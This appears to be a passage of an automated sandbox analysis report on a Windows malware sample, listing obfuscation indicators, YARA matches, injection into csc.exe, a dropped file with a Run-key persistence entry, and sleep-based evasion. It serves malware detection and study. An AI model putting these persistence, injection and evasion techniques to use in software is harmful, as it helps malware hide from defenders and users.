              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: mskeyprotect.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: ntasn1.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: ncrypt.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: ncryptsslp.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
              Source: pPLwX9wSrD.exeStatic file information: File size 10485760 > 1048576
              Source: pPLwX9wSrD.exeStatic PE information: Raw size of .rsrc is bigger than: 0x100000 < 0x219c00
              Source: pPLwX9wSrD.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
              Source: Binary string: D:\Rohan_SVN\Source\Server\RunRelease\DBServerT.pdb source: pPLwX9wSrD.exe, OrionLegacyCLI.exe.0.dr
              Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdbSHA256e source: csc.exe, 00000003.00000002.3521352384.0000000007308000.00000004.00000800.00020000.00000000.sdmp, csc.exe, 00000003.00000003.2507632502.0000000008713000.00000004.00000800.00020000.00000000.sdmp, csc.exe, 00000003.00000003.2507632502.0000000008655000.00000004.00000800.00020000.00000000.sdmp, csc.exe, 00000003.00000002.3524105606.000000000A310000.00000004.08000000.00040000.00000000.sdmp
              Source: Binary string: Srlfeb.pdb source: csc.exe, 00000003.00000002.3522778498.0000000009760000.00000004.08000000.00040000.00000000.sdmp, csc.exe, 00000003.00000003.2507632502.000000000833C000.00000004.00000800.00020000.00000000.sdmp, csc.exe, 00000003.00000003.2507632502.000000000851E000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdb source: csc.exe, 00000003.00000002.3521352384.0000000007308000.00000004.00000800.00020000.00000000.sdmp, csc.exe, 00000003.00000003.2507632502.0000000008713000.00000004.00000800.00020000.00000000.sdmp, csc.exe, 00000003.00000003.2507632502.0000000008655000.00000004.00000800.00020000.00000000.sdmp, csc.exe, 00000003.00000002.3524105606.000000000A310000.00000004.08000000.00040000.00000000.sdmp
              Source: Binary string: protobuf-net.pdbSHA256}Lq source: csc.exe, 00000003.00000003.2507632502.0000000008655000.00000004.00000800.00020000.00000000.sdmp, csc.exe, 00000003.00000002.3523561081.0000000009A50000.00000004.08000000.00040000.00000000.sdmp, csc.exe, 00000003.00000003.2507632502.000000000851E000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: protobuf-net.pdb source: csc.exe, 00000003.00000003.2507632502.0000000008655000.00000004.00000800.00020000.00000000.sdmp, csc.exe, 00000003.00000002.3523561081.0000000009A50000.00000004.08000000.00040000.00000000.sdmp, csc.exe, 00000003.00000003.2507632502.000000000851E000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: D:\Rohan_SVN\Source\Server\RunRelease\DBServerT.pdbP2N source: pPLwX9wSrD.exe, OrionLegacyCLI.exe.0.dr
              Source: Binary string: Srlfeb.pdbx source: csc.exe, 00000003.00000002.3522778498.0000000009760000.00000004.08000000.00040000.00000000.sdmp, csc.exe, 00000003.00000003.2507632502.000000000833C000.00000004.00000800.00020000.00000000.sdmp, csc.exe, 00000003.00000003.2507632502.000000000851E000.00000004.00000800.00020000.00000000.sdmp

              Data Obfuscation

              barindex
              Source: 0.2.pPLwX9wSrD.exe.d00000.1.raw.unpack, ResponderElement.cs.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
              Source: 3.3.csc.exe.851ed28.0.raw.unpack, H9dYhdNnGJ0iMLyBevQ.cs.Net Code: Type.GetTypeFromHandle(G7xv6UQryw9sD1SGpf2.VRcsQKwJNu(16777307)).GetMethod("GetDelegateForFunctionPointer", new Type[2]{Type.GetTypeFromHandle(G7xv6UQryw9sD1SGpf2.VRcsQKwJNu(16777250)),Type.GetTypeFromHandle(G7xv6UQryw9sD1SGpf2.VRcsQKwJNu(16777305))})
              Source: 3.2.csc.exe.9760000.3.raw.unpack, H9dYhdNnGJ0iMLyBevQ.cs.Net Code: Type.GetTypeFromHandle(G7xv6UQryw9sD1SGpf2.VRcsQKwJNu(16777307)).GetMethod("GetDelegateForFunctionPointer", new Type[2]{Type.GetTypeFromHandle(G7xv6UQryw9sD1SGpf2.VRcsQKwJNu(16777250)),Type.GetTypeFromHandle(G7xv6UQryw9sD1SGpf2.VRcsQKwJNu(16777305))})
              Source: 3.3.csc.exe.83ded08.2.raw.unpack, H9dYhdNnGJ0iMLyBevQ.cs.Net Code: Type.GetTypeFromHandle(G7xv6UQryw9sD1SGpf2.VRcsQKwJNu(16777307)).GetMethod("GetDelegateForFunctionPointer", new Type[2]{Type.GetTypeFromHandle(G7xv6UQryw9sD1SGpf2.VRcsQKwJNu(16777250)),Type.GetTypeFromHandle(G7xv6UQryw9sD1SGpf2.VRcsQKwJNu(16777305))})
              Source: 0.2.pPLwX9wSrD.exe.d00000.1.raw.unpack, MapAnalyzer.cs.Net Code: IncludeMap System.Reflection.Assembly.Load(byte[])
              Source: 3.2.csc.exe.9760000.3.raw.unpack, AssemblyLoader.cs.Net Code: ReadFromEmbeddedResources System.Reflection.Assembly.Load(byte[])
              Source: 3.2.csc.exe.9760000.3.raw.unpack, mD3UqCQfvhthrqY1XLA.cs.Net Code: mpweScRsCB
              Source: 3.2.csc.exe.9760000.3.raw.unpack, mD3UqCQfvhthrqY1XLA.cs.Net Code: Y1lwRxS2Wu
              Source: 3.3.csc.exe.8605b68.8.raw.unpack, TypeModel.cs.Net Code: TryDeserializeList
              Source: 3.3.csc.exe.8605b68.8.raw.unpack, ListDecorator.cs.Net Code: Read
              Source: 3.3.csc.exe.8605b68.8.raw.unpack, TypeSerializer.cs.Net Code: CreateInstance
              Source: 3.3.csc.exe.8605b68.8.raw.unpack, TypeSerializer.cs.Net Code: EmitCreateInstance
              Source: 3.3.csc.exe.8605b68.8.raw.unpack, TypeSerializer.cs.Net Code: EmitCreateIfNull
              Source: 3.2.csc.exe.a310000.6.raw.unpack, ReflectionHelper.cs.Net Code: InvokeMethod
              Source: 3.2.csc.exe.a310000.6.raw.unpack, ReflectionHelper.cs.Net Code: InvokeMethod
              Source: 3.2.csc.exe.a310000.6.raw.unpack, XmlSerializationHelper.cs.Net Code: ReadObjectProperties
              Source: Yara matchFile source: 3.2.csc.exe.82c6ca8.2.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 3.2.csc.exe.99f0000.4.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000003.00000002.3523495000.00000000099F0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000003.00000002.3521980396.0000000008242000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000003.00000002.3521352384.00000000070A1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: csc.exe PID: 2604, type: MEMORYSTR
              Source: C:\Users\user\Desktop\pPLwX9wSrD.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe"
              Source: C:\Users\user\Desktop\pPLwX9wSrD.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe"Jump to behavior
              Source: C:\Users\user\Desktop\pPLwX9wSrD.exeCode function: 0_2_0047F5D0 push eax; ret 0_2_0047F5E4
              Source: C:\Users\user\Desktop\pPLwX9wSrD.exeCode function: 0_2_0047F5D0 push eax; ret 0_2_0047F60C
              Source: C:\Users\user\Desktop\pPLwX9wSrD.exeCode function: 0_2_00484767 push ecx; ret 0_2_00484777
              Source: C:\Users\user\Desktop\pPLwX9wSrD.exeCode function: 0_2_00483E84 push eax; ret 0_2_00483EA2
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_06E1458B push es; iretd 3_2_06E14590
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_06E143B1 push es; iretd 3_2_06E143C0
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_0986FD40 push C0330984h; ret 3_2_0986FD52
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_09871801 pushfd ; retf 3_2_0987180D
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_0987BACF push cs; retf 3_2_0987BAD7
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_0987CF0C push eax; ret 3_2_0987CFF9
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_0987068B push 8B000001h; iretd 3_2_09870690
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_0987CECB push ds; retf 3_2_0987CF09
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_09AA0158 pushad ; iretd 3_2_09AA0159
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_09AAD5E4 push esi; retf 3_2_09AAD5E5
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_09AAD638 pushad ; retf 3_2_09AAD639
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_09BC31AA push cs; retf 3_2_09BC31AB
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_09BC3991 push es; retf 3_2_09BC3998
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_09BC21C9 push ds; retf 3_2_09BC21CD
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_09BC212F push ds; retf 3_2_09BC2133
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_09BC3322 push ss; retf 3_2_09BC3323
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_09BC3175 push cs; retf 3_2_09BC3176
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_09BC2B4A push ds; retf 3_2_09BC2B4E
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_09BC42BD push es; retf 3_2_09BC42CA
              Source: 3.3.csc.exe.851ed28.0.raw.unpack, nVJXBHQlPK5MbsS3eA3.csHigh entropy of concatenated method names: 'BBcQRftNqD', 'd2TQqB3jnD', 'jnkQxcPWSg', 'C8qQ68cUX4', 'HmGQBW2KGL', 'laMQMe27VV', 'ho4Q5k8pLU', 'q2SQG9KEgk', 'TYpQhxCh2I', 'y4YQP4BKHw'
              Source: 3.3.csc.exe.851ed28.0.raw.unpack, H9dYhdNnGJ0iMLyBevQ.csHigh entropy of concatenated method names: 'OfbSv8rvP8IwIGTU9i5', 'OnVoiRrcqCKf9Oa5MKD', 'wCYQpIFDtr', 'vh0ry9Sq2v', 'knSQNj5fu2', 'hDnQXpIt5a', 's6NQQGkJ2u', 'uL3QCnlUTe', 'zAksN7Kboq', 'nEuN7jDDgS'
              Source: 3.3.csc.exe.851ed28.0.raw.unpack, h5gmjUDfwmEIIaJIRm.csHigh entropy of concatenated method names: 'qJXkK5FGP', 'y5n3tVyRy', 'mpsWotT5h', 'Q151kS8re', 'C5oHI4ky5', 'FE4TwCkUE', 'RsKB315Ts', 'Y3UjapZQ9', 'cTvE9yeC7', 'JuXRGSDIb'
              Source: 3.3.csc.exe.851ed28.0.raw.unpack, mD3UqCQfvhthrqY1XLA.csHigh entropy of concatenated method names: 'kZVmBcn3nH', 'c6mmMubrE1', 'rLcm5NIp7U', 'Cs1mG384O5', 'd5amh5XGlj', 'XjOmPwBtBp', 'y0amf6i8QU', 'L2LCL2ZT7K', 'qXwmUSxH1y', 'dCEm4raWXl'
              Source: 3.2.csc.exe.9760000.3.raw.unpack, nVJXBHQlPK5MbsS3eA3.csHigh entropy of concatenated method names: 'BBcQRftNqD', 'd2TQqB3jnD', 'jnkQxcPWSg', 'C8qQ68cUX4', 'HmGQBW2KGL', 'laMQMe27VV', 'ho4Q5k8pLU', 'q2SQG9KEgk', 'TYpQhxCh2I', 'y4YQP4BKHw'
              Source: 3.2.csc.exe.9760000.3.raw.unpack, x9vYvta5uRPmJpbcUPr.csHigh entropy of concatenated method names: 'r0lafIUClb', 'cfKxrtgbQjdlrUJ4Lfx', 'r5se3YgyGsm0NWhRKjC', 'P4Xa8ReiVU', 'qZDYH9gA7aOmK2rvP6D', 'XSZPQvg983alftxuAUX', 'oG2ah1h9cn', 'msdaPaGN1g', 'kHoCCxgUwIlMVxFK0C3', 'AYP2MKg49iKkeWLNiqS'
              Source: 3.2.csc.exe.9760000.3.raw.unpack, H9dYhdNnGJ0iMLyBevQ.csHigh entropy of concatenated method names: 'OfbSv8rvP8IwIGTU9i5', 'OnVoiRrcqCKf9Oa5MKD', 'wCYQpIFDtr', 'vh0ry9Sq2v', 'knSQNj5fu2', 'hDnQXpIt5a', 's6NQQGkJ2u', 'uL3QCnlUTe', 'zAksN7Kboq', 'nEuN7jDDgS'
              Source: 3.2.csc.exe.9760000.3.raw.unpack, h5gmjUDfwmEIIaJIRm.csHigh entropy of concatenated method names: 'qJXkK5FGP', 'y5n3tVyRy', 'mpsWotT5h', 'Q151kS8re', 'C5oHI4ky5', 'FE4TwCkUE', 'RsKB315Ts', 'Y3UjapZQ9', 'cTvE9yeC7', 'JuXRGSDIb'
              Source: 3.2.csc.exe.9760000.3.raw.unpack, mD3UqCQfvhthrqY1XLA.csHigh entropy of concatenated method names: 'kZVmBcn3nH', 'c6mmMubrE1', 'rLcm5NIp7U', 'Cs1mG384O5', 'd5amh5XGlj', 'XjOmPwBtBp', 'y0amf6i8QU', 'L2LCL2ZT7K', 'qXwmUSxH1y', 'dCEm4raWXl'
              Source: 3.2.csc.exe.9760000.3.raw.unpack, Gp3qmlFjJ2RWq7TURuq.csHigh entropy of concatenated method names: 'zqBF8g5b3n', 'WoHM1igtKIfGu6GAOtX', 'pLtD82gJI3Ms4ZJA3Vm', 'lOPFhVX5Ra', 'FbeFP7saex', 'x61FRPcePl', 'DGRFqUpm9o', 'DXTFx5xgEE', 'paEF6FnxRs', 'wNlFBJ9xRY'
              Source: 3.3.csc.exe.83ded08.2.raw.unpack, nVJXBHQlPK5MbsS3eA3.csHigh entropy of concatenated method names: 'BBcQRftNqD', 'd2TQqB3jnD', 'jnkQxcPWSg', 'C8qQ68cUX4', 'HmGQBW2KGL', 'laMQMe27VV', 'ho4Q5k8pLU', 'q2SQG9KEgk', 'TYpQhxCh2I', 'y4YQP4BKHw'
              Source: 3.3.csc.exe.83ded08.2.raw.unpack, H9dYhdNnGJ0iMLyBevQ.csHigh entropy of concatenated method names: 'OfbSv8rvP8IwIGTU9i5', 'OnVoiRrcqCKf9Oa5MKD', 'wCYQpIFDtr', 'vh0ry9Sq2v', 'knSQNj5fu2', 'hDnQXpIt5a', 's6NQQGkJ2u', 'uL3QCnlUTe', 'zAksN7Kboq', 'nEuN7jDDgS'
              Source: 3.3.csc.exe.83ded08.2.raw.unpack, h5gmjUDfwmEIIaJIRm.csHigh entropy of concatenated method names: 'qJXkK5FGP', 'y5n3tVyRy', 'mpsWotT5h', 'Q151kS8re', 'C5oHI4ky5', 'FE4TwCkUE', 'RsKB315Ts', 'Y3UjapZQ9', 'cTvE9yeC7', 'JuXRGSDIb'
              Source: 3.3.csc.exe.83ded08.2.raw.unpack, mD3UqCQfvhthrqY1XLA.csHigh entropy of concatenated method names: 'kZVmBcn3nH', 'c6mmMubrE1', 'rLcm5NIp7U', 'Cs1mG384O5', 'd5amh5XGlj', 'XjOmPwBtBp', 'y0amf6i8QU', 'L2LCL2ZT7K', 'qXwmUSxH1y', 'dCEm4raWXl'
              Source: C:\Users\user\Desktop\pPLwX9wSrD.exeFile created: C:\Users\user\Videos\OrionLegacy\Bin\OrionLegacyCLI.exeJump to dropped file
              Source: C:\Users\user\Desktop\pPLwX9wSrD.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run OrionLegacyCLIJump to behavior
              Source: C:\Users\user\Desktop\pPLwX9wSrD.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run OrionLegacyCLIJump to behavior
              Source: C:\Users\user\Desktop\pPLwX9wSrD.exeCode function: 0_2_00412630 IsIconic,SendMessageA,GetSystemMetrics,GetSystemMetrics,GetClientRect,DrawIcon,0_2_00412630
              Source: C:\Users\user\Desktop\pPLwX9wSrD.exeCode function: 0_2_00478ECF IsIconic,GetWindowPlacement,GetWindowRect,0_2_00478ECF
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

              Malware Analysis System Evasion

              barindex
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_DiskDrive
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_DiskDrive
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeMemory allocated: 6D30000 memory reserve | memory write watchJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeMemory allocated: 70A0000 memory reserve | memory write watchJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeMemory allocated: 6D30000 memory reserve | memory write watchJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeThread delayed: delay time: 417000Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeThread delayed: delay time: 419000Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeWindow / User API: threadDelayed 4110Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeWindow / User API: threadDelayed 5692Jump to behavior
              Source: C:\Users\user\Desktop\pPLwX9wSrD.exeDropped PE file which has not been started: C:\Users\user\Videos\OrionLegacy\Bin\OrionLegacyCLI.exeJump to dropped file
              Source: C:\Users\user\Desktop\pPLwX9wSrD.exeAPI coverage: 0.1 %
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe TID: 4984Thread sleep time: -27670116110564310s >= -30000sJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe TID: 4984Thread sleep time: -60000s >= -30000sJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe TID: 1772Thread sleep count: 4110 > 30Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe TID: 4984Thread sleep time: -59874s >= -30000sJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe TID: 1772Thread sleep count: 5692 > 30Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe TID: 4984Thread sleep time: -59652s >= -30000sJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe TID: 4984Thread sleep time: -59227s >= -30000sJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe TID: 4984Thread sleep time: -59031s >= -30000sJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe TID: 4984Thread sleep time: -58921s >= -30000sJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe TID: 4984Thread sleep time: -58812s >= -30000sJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe TID: 4984Thread sleep time: -58703s >= -30000sJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe TID: 4984Thread sleep time: -58593s >= -30000sJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe TID: 4984Thread sleep time: -58484s >= -30000sJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe TID: 4984Thread sleep time: -58375s >= -30000sJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe TID: 4984Thread sleep time: -58263s >= -30000sJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe TID: 4984Thread sleep time: -58156s >= -30000sJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe TID: 4984Thread sleep time: -58046s >= -30000sJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe TID: 4984Thread sleep time: -57937s >= -30000sJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe TID: 4984Thread sleep time: -57703s >= -30000sJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe TID: 4984Thread sleep time: -57577s >= -30000sJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe TID: 4984Thread sleep time: -57465s >= -30000sJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe TID: 4984Thread sleep time: -57359s >= -30000sJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe TID: 4984Thread sleep time: -57246s >= -30000sJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe TID: 4984Thread sleep time: -57139s >= -30000sJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe TID: 4984Thread sleep time: -57031s >= -30000sJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe TID: 4984Thread sleep time: -56766s >= -30000sJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe TID: 4984Thread sleep time: -56638s >= -30000sJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe TID: 4984Thread sleep time: -56079s >= -30000sJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe TID: 4984Thread sleep time: -55953s >= -30000sJump to behavior
